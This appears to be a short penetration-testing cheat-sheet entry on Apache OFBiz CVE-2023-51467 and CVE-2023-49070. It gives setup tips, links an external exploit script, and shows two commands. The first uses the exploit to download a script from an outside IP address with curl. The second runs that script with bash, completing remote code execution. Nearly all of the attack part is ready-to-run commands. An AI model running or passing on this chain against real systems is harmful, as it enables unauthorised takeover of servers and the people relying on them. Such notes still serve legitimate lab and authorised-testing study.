############
Apache OFBiz
############

********************
CVE-2023-51467/49070
********************

| CVE-2023-51467 and CVE-2023-49070

| You will need to set /etc/hosts entry for "demo-stable.ofbiz.apache.org" in order to bypass hostname restriction
| Check if /content/control/main is a valid login page
| https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass

.. code-block:: bash

    python3 exploit.py --url https://demo-stable.ofbiz.apache.org:8443 --cmd 'curl 10.10.14.4/r.sh -o /tmp/r.sh'
    python3 exploit.py --url https://demo-stable.ofbiz.apache.org:8443 --cmd 'bash /tmp/r.sh'